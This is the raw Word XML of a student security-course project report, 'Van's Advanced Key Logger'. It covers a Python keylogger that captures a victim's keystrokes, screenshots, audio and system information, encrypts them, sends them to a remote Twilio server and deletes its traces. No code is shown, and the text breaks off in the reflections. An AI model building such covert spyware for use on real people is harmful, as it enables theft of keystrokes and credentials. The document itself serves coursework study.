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7BE10" w14:textId="4BED8C6C" w:rsidR="0032334C" w:rsidRDefault="00F60161" w:rsidP="00E6398F">
      <w:pPr>
        <w:jc w:val="center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Van’s</w:t>
      </w:r>
      <w:r w:rsidR="0032334C" w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Advanced Key Logge</w:t>
      </w:r>
      <w:r w:rsidR="00B93F64" w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7852A" w14:textId="13C0C39C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Vandana Rao Emaneni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147E48C" w14:textId="49FD2CC4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Z5451278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB62870" w14:textId="4B15AB74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W16A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148328A2" w14:textId="18D6CA6F" w:rsidR="007E38A6" w:rsidRP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COMP6441</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:id w:val="-9019034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33F6AE" w14:textId="391B3DD3" w:rsidR="0032334C" w:rsidRPr="008A59D5" w:rsidRDefault="0032334C" w:rsidP="00E6398F">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008A59D5">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="72247E62" w14:textId="444456AA" w:rsidR="00734730" w:rsidRDefault="0032334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8A59D5">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008A59D5">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008A59D5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149301446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Summary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_Toc149301446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D1165FE" w14:textId="0E6CA913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47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Scope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_Toc149301447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F82ACCC" w14:textId="1048F862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48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_Toc149301448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32BDAC2" w14:textId="281CF4B2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49" w:history="1">
            <w:r w:rsidR="00734730" w:rsidRPr="00824897">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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_Toc149301449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4743DB5" w14:textId="3AFD81A7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0" w:history="1">
            <w:r w:rsidR="00734730" w:rsidRPr="00824897">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unachieved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_Toc149301450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A7044E9" w14:textId="10017F64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1" w:history="1">
            <w:r w:rsidR="00734730" w:rsidRPr="00824897">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Additional 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_Toc149301451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301077BC" w14:textId="2EF644D7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2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Outcomes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_Toc149301452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2CE4004" w14:textId="6A0DBDD1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3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Reflections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_Toc149301453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3D7A8F54" w14:textId="16AA856A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4" w:history="1">
            <w:r w:rsidR="00734730" w:rsidRPr="00824897">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Challenges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_Toc149301454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1D95400" w14:textId="3D3820E6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5" w:history="1">
            <w:r w:rsidR="00734730" w:rsidRPr="00824897">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proudest Moments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_Toc149301455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9783D3F" w14:textId="650BD5E7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6" w:history="1">
            <w:r w:rsidR="00734730" w:rsidRPr="00824897">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hurdles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_Toc149301456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4D26B0A" w14:textId="488458D6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7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Code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_Toc149301457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5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761073F" w14:textId="19B2E8F1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8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Outputs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_Toc149301458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10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05FC09A" w14:textId="527E60B6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9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Appendix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_Toc149301459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16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E8B2F54" w14:textId="746C76B6" w:rsidR="0032334C" w:rsidRPr="008A59D5" w:rsidRDefault="0032334C" w:rsidP="00E6398F">
          <w:pPr>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008A59D5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6A2CE04F" w14:textId="38691747" w:rsidR="00C302BF" w:rsidRPr="00C61050" w:rsidRDefault="00B50FD1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r w:rsidRPr="00983598">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00983598">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00983598">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc149301543" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: Weekly Timeline Progress Report</w:t>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc149301543 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C61050">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56A627EA" w14:textId="2D3734C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4" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2: Less secure app access revoked.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_Toc149301544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3F562775" w14:textId="637F07BF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5" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3: Generation of encryption key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_Toc149301545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10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734791C" w14:textId="2FDCBACA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6" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4: Pasting the key in keylogger.py.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_Toc149301546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10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3171D8F" w14:textId="7EADBE5E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7" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: Pasting the key in decryptionfiles.py.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_Toc149301547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11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8D5D07E" w14:textId="338B863C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8" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6: syseminfo.txt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_Toc149301548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11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DAC2793" w14:textId="480E9B53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9" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7: screenshot.png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_Toc149301549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12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076F5EA" w14:textId="67D209AC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0" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: key_log.txt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_Toc149301550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12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EC4DEBD" w14:textId="3675396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1" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: Encrypted key_log.txt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_Toc149301551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13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31A1AC23" w14:textId="64A77999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2" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10: Encrypted syseminfo.txt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_Toc149301552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13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2558C64" w14:textId="10EA79A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3" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Decrypted contents of key_logs.txt and syseminfo.txt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_Toc149301553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46F78B5B" w14:textId="28EAD48E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4" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12: Clean-up of generated files in directory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_Toc149301554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1A9F049" w14:textId="54D880FD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5" w:history="1">
        <w:r w:rsidR="00C302BF" w:rsidRPr="00C302BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13: Twilio SMS notifications for encrypted file contents of key_logs.txt and syseminfo.txt sent to remote server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_Toc149301555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16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96B922C" w14:textId="0F73EC46" w:rsidR="0032334C" w:rsidRPr="008A59D5" w:rsidRDefault="00B50FD1" w:rsidP="00E6398F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983598">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51BF6E" w14:textId="04B8440B" w:rsidR="007E38A6" w:rsidRDefault="0032334C" w:rsidP="001460CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc149301446"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="13A76201" w14:textId="07947B21" w:rsidR="00983598" w:rsidRDefault="00983598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After having some initial troubles in selecting an interesting topic for my project for this course, I decided to go ahead and get my hands a bit dirty in developing an advanced key </w:t>
      </w:r>
      <w:r w:rsidR="0004234A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">logger in Python with the following </w:t>
      </w:r>
      <w:r w:rsidR="00FC3CD9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C21B62" w14:textId="50C2B5C8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key logs / strokes in a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCC681" w14:textId="3E116AAC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screenshots of the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F165FB6" w14:textId="2E8B636F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audio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687DA9F" w14:textId="7C1DD77E" w:rsidR="00FC3CD9" w:rsidRPr="00983598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system’s information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3022D" w14:textId="4D6B4A3E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1" w:name="_Toc149301447"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2A509B96" w14:textId="5AA15441" w:rsidR="00983598" w:rsidRPr="00983598" w:rsidRDefault="00FC3CD9" w:rsidP="00B2052F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on the above summary, I decided to put a timeline progress report on how I was going to achieve this over the 8 weeks of duration given. Each week focused on small activities that either involved self-learning / research, hands-on programming examples, development, </w:t>
      </w:r>
      <w:r w:rsidR="00B2052F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>documentation,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and videoing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB4B85" w14:textId="2826A84A" w:rsidR="00983598" w:rsidRDefault="00983598" w:rsidP="00983598">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D107EDD" w14:textId="77777777" w:rsidR="00983598" w:rsidRDefault="00983598" w:rsidP="00983598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30D89DF2" wp14:editId="4AC442C6">
            <wp:extent cx="5731510" cy="3894455"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="8462887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88785" name="Picture 8462887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E7DE" w14:textId="502C146B" w:rsidR="00983598" w:rsidRPr="00983598" w:rsidRDefault="00983598" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc149301543"/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Weekly Timeline Progress Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="28C5F596" w14:textId="13B21A3B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3" w:name="_Toc149301448"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Deliverables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="69DB3D0C" w14:textId="61CFB7E8" w:rsidR="00C8249B" w:rsidRDefault="00C8249B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Based on the deliverables stated in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00C8249B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>Project Brief Proposal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, I have addressed this section in a manner where I highlight: the deliverables I have been able to achieve, the deliverables I haven’t been able to achieve, any additional deliverables / improvements that I have been able to achieve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D49694" w14:textId="0A905CFA" w:rsidR="00C8249B" w:rsidRDefault="00C8249B" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc149301449"/>
      <w:r>
        <w:t>Achieved Deliverables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7778C457" w14:textId="016F68A4" w:rsidR="00C8249B" w:rsidRP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rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Eliminate extra key codes and single quotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4525060D" w14:textId="2B56D2F0" w:rsidR="002626B9" w:rsidRP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rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Capture and store keystrokes in a file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF347CE" w14:textId="4B7E4160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lastRenderedPageBreak/>
        <w:t>Usage of Python &amp; its respective libraries to implement Key Logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D1D7F" w14:textId="3CB16C88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Build a customised Advance Key Logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A5E69" w14:textId="6385A3D3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Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012CC5FD" w14:textId="73EC1C1B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System Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304885F2" w14:textId="080FA593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Audio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAEFEC" w14:textId="3F12F2C1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Keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609891FF" w14:textId="4AD2BBC6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Acquire complete computer information of a victim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (system information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420413F" w14:textId="79E26F83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 xml:space="preserve">Capture a </w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002626B9">
        <w:t>creenshot of a victim's device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F566E3B" w14:textId="3A60C7B7" w:rsidR="002626B9" w:rsidRPr="00C8249B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Understanding a victim's system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (system information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58034639" w14:textId="451FDD9B" w:rsidR="00C8249B" w:rsidRDefault="00C8249B" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc149301450"/>
      <w:r>
        <w:t>Unachieved Deliverables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3C6E8FB2" w14:textId="19651FAD" w:rsidR="002626B9" w:rsidRDefault="002626B9" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002626B9">
        <w:t>Sending keystrokes via EMAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323448EC" w14:textId="5C9A7C34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The reason why this wasn’t achieved was GMAIL has deprecated a setting to send emails from an unknown third-party application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9A90C5" w14:textId="57B24D0A" w:rsidR="002626B9" w:rsidRP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So instead of sending it to an email address, I will be sending it to a remote server (Twilio) that can be accessed via account credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A661D1" w14:textId="79E2C99C" w:rsidR="00C8249B" w:rsidRDefault="00C8249B" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc149301451"/>
      <w:r>
        <w:t>Additional Achieved Deliverables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0550D05E" w14:textId="0C325591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Remote Twilio server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C1857" w14:textId="7213C22D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SMS notifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45958717" w14:textId="6663E1C2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Sending encrypted data files to the remote server that can be accessed via account credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BCF4B" w14:textId="1B75D094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Clean-up of activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFBA066" w14:textId="668E996A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Erase any signs of the key logger activity performed from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B04337" w14:textId="59FB5643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Here it is deletion of the 4 generated / captured files – screenshot image file, system info text file, audio file, key logs text file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3226DB" w14:textId="54FF9E09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Encryption &amp; Decryption Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D71071" w14:textId="53145FC4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Even though I could send the key logs text file and system info file as a plain text, readable file to the server, I decided to add another layer of security by encrypting the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D8F65" w14:textId="4EC72567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 xml:space="preserve">These 2 encrypted files will be sent to the remote server </w:t>
      </w:r>
      <w:r w:rsidR="00CA55BF">
        <w:t>that can later be decrypted using the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B29A6" w14:textId="519679E2" w:rsidR="00CA55BF" w:rsidRPr="002626B9" w:rsidRDefault="00CA55BF" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Also, to show the decryption part, I have stored these files on the system and shown the decrypted contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8D22E" w14:textId="18ABF418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7" w:name="_Toc149301452"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Outcomes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5712E6E6" w14:textId="2807321C" w:rsidR="004D19E6" w:rsidRDefault="004D19E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After doing this hands-on project, few outcomes / takeaways’ I got was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01693BDB" w14:textId="74034FDD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Learn about keyloggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D17CDD" w14:textId="7E73C58B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Understand the different functionalities keyloggers offer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3651EC05" w14:textId="7B71FA16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Learn about the working of keyloggers in action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72969E7F" w14:textId="4499340D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 w:rsidRPr="004D19E6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Implement an advanced, working key logger in Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57E9FE" w14:textId="104ABE82" w:rsidR="004D19E6" w:rsidRP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Improved my coding skills in Python by using various new Python libraries to implement the functions of the key logger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699506E" w14:textId="7EFDCE15" w:rsidR="0032334C" w:rsidRPr="008A59D5" w:rsidRDefault="0032334C" w:rsidP="00E6398F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc149301453"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Reflections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="3EC1B3A5" w14:textId="4FFD7D4E" w:rsidR="00B93F64" w:rsidRDefault="004D19E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After successfully completing this interesting project over 8 weeks, I have addressed this section in a manner where I highlight: the challenges I had, the proudest moments / achievements, the hurdles I faced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63B11E" w14:textId="56B0F28B" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc149301454"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Challenges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3E8126DB" w14:textId="63C8293C" w:rsid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 xml:space="preserve">Understanding </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and learning </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11274">
        <w:t>different python libraries and its usage</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F8C90" w14:textId="219C4BE0" w:rsidR="0021409D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>Understanding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the various settings on Mac OS that needs to be enabled to setup the development environment to start working on the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66853E36" w14:textId="22A704C3" w:rsidR="00A11274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>Understanding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
